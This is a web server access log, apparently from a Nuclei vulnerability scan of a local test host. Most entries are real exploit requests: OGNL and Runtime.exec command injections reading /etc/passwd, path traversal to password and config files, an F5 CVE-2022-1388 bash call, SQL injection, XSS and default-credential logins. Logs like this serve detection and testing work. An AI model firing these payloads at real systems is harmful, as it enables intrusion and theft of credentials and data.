/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/userinfo.php?UID=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 